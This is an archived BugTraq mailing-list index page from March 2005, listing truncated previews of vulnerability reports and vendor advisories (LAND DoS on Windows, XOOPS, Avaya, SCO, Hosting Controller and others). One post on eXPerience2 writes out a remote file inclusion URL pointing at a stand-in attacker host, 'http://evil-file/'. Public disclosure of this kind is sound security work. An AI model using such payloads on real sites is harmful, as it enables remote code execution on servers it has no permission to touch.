BugTraq Mode:
(Page 1365 of 1748)  < Prev  1360 1361 1362 1363 1364 1365 1366 1367 1368 1369 1370  Next >
Re: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-08
Espen Grøndahl (espen groendahl siemens com)
In-Reply-To: <20050307215532.GA24251 (at) logos.microshaft (dot) org [email concealed]>

Hello

I've been able to reproduce this.

I used ipmagic on debian 3.0 and sent a packet to a fully patched Windows 2003 server running on Vmware ESX server. I got a 1-5 sec. 100% load on the CPU on the target server. 1 packet/pr. sec. was

Re: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-08
paul14075 adelphia net
In-Reply-To: <20050307215532.GA24251 (at) logos.microshaft (dot) org [email concealed]>

I can confirm a 15-30 second DoS condition (per packet) on Windows XP Professional SP2 (100% up2date with all Microsoft patches). I tested port 139 which was open and unfirewalled.

I found that the IP and TCP header checksums *do* need

[SCAN Associates Security Advisory] xoops 2.0.9.2 and below weak file extension validation 2005-03-08
pokley (pokleyzz scan-associates net)
Summary: xoops 2.0.9.2 and below weak file extension validation

Description
===========
XOOPS is an extensible, OO (Object Oriented), easy to use dynamic web
content management system written in PHP. XOOPS is the ideal tool for
developing small to large dynamic community websites, intra company

RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability 2005-03-08
Walton, John Michael (John) (jmwalton avaya com)
Avaya has finished our investigation of this issue and an Avaya Security
Advisory, ASA-2005-041, has been released. The advisory can be obtained
from:

http://support.avaya.com/security

or directly from:

http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf

We expe

PE Multiple Remote Access Validation Vulnerabilities (Participate Systems Inc. / Outstart Inc.) 2005-03-08
Altrus Wollesen (root honour ca)


--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE

Versions affected: <unknown>

Vendor(s): Outstart

Multiples Vulnerabilities 2005-03-07
Francisco Alisson (dominusvis click21 com br)


Multiples Vulnerabilities

Product: eXPerience2

I. Remote File Inclusion
http://www.host-vulnerable.com/eXPerience2/modules.php?file=http://evil-file/

II. Full Path Disclosure
http://www.host-vulnerable.com/eXPerience2/modules.php

Thank you very much :D

[ Infektion Group ]
irc.gig

Re: Gene6 FTP Server Local Privilege Escalation Vulnerability 2005-03-08
Matthieu (gene6 gene6 com)
In-Reply-To: <5ed07f7a05030708092d774ef8 (at) mail.gmail (dot) com [email concealed]>

>(4) Vendor Reply
>
>Reply from the support (at) G6FtpServer (dot) com [email concealed]
[..]

Here is a copy of our first reply with the solution :

- create a new administrator account
- in Administration / Properties, uncheck Options / Allow all access to localhost.

iDEFENSE Labs Releases IDA RPC Enumerator 2005-03-07
iDEFENSE Labs (labs-no-reply idefense com)
Developed by Pedram Amini, IDA RPC Enumerator has been released as open
source and is available for download from:

http://labs.idefense.com

IDA RPC Enumerator is an RPC auditing utility written in the IDA Pro
Scripting language, IDC. The script was written to automate the process
of locati

RE: thoughts and a possible solution on homograph attacks 2005-03-07
Scovetta, Michael V (Michael Scovetta ca com)
Michael,
A few comments. First, in response to:

>I propose to present the user with a dialog showing the text to be
>validated and an input field, into which the user has to type in the given
>text again. The user is told, if both texts match precisely and what this
>means: If the typed text's in

UnixWare 7.1.4 : squid updated package fixes several security issues 2005-03-07
please_reply_to_security sco com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

SCO Security Advisory

Subject: UnixWare 7.1.4 : squid updated package fixes several security issues
Advisory number: SCOSA-2005.16
Issue date: 2005 February 11
Cr

Hosting Controller Multiple Unauthenticated information disclose 2005-03-07
small mouse (small mouse gmail com)
-= Security Advisory =-

Advisory Information
-------------------------

Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerability : Multiple Unauthenticated informati

UnixWare 7.1.4 : Samba multiple security issues 2005-03-07
please_reply_to_security sco com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

SCO Security Advisory

Subject: UnixWare 7.1.4 : Samba multiple security issues
Advisory number: SCOSA-2005.17
Issue date: 2005 February 11
Cross reference: sr8924

Re: [ GLSA 200503-12 ] Hashcash: Format string vulnerability 2005-03-07
Hubert Chan (hubert uhoreg ca)
>>>>> "Thierry" == Thierry Carrez <koon (at) gentoo (dot) org [email concealed]> writes:

[...]

Thierry> Affected packages
Thierry> =================

Thierry> -------------------------------------------------------------------
Thierry> Package / Vulnerable / Unaffected
Thierry> ---

Copyright 2010, SecurityFocus